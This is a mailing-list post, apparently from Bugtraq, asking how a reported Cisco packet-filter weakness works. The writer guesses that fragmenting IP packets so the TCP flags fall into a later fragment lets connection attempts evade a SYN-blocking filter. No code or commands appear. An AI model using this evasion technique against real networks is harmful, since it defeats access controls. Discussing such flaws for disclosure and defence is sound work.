Re: Cisco problems

[mcn () EnGarde com (Mike Neuman)]

In a message to bugtraq, Paul Ferguson (paul () hawksbill sprintmrn com) wrote:
> The discussion did occur on firewalls. In fact, there was a rather
> lengthy discussion on IP fragmentation as an attack method.

  In a following exchange of email, we've discovered the messages from
this "lengthy discussion" are not a part of the firewalls archive. Apparently
Brent decided they were off topic and removed them...

  So, my original question stands: Any information on this?

  My *guess* is:

  The filter looks for a TCP packet with a SYN but no ACK. (rejecting incoming
connections, but allowing incoming replies to outgoing connections).

  Fragment an IP packet so the TCP header (especially the flags) are moved
to another fragment. The router allows the packet to pass (maybe even the
next one containing the flags as well?).

  Is this right? Or is there more to it than this? Do Ciscos reassemble the
packets to match the internal MTU?

-Mike
mcn () EnGarde com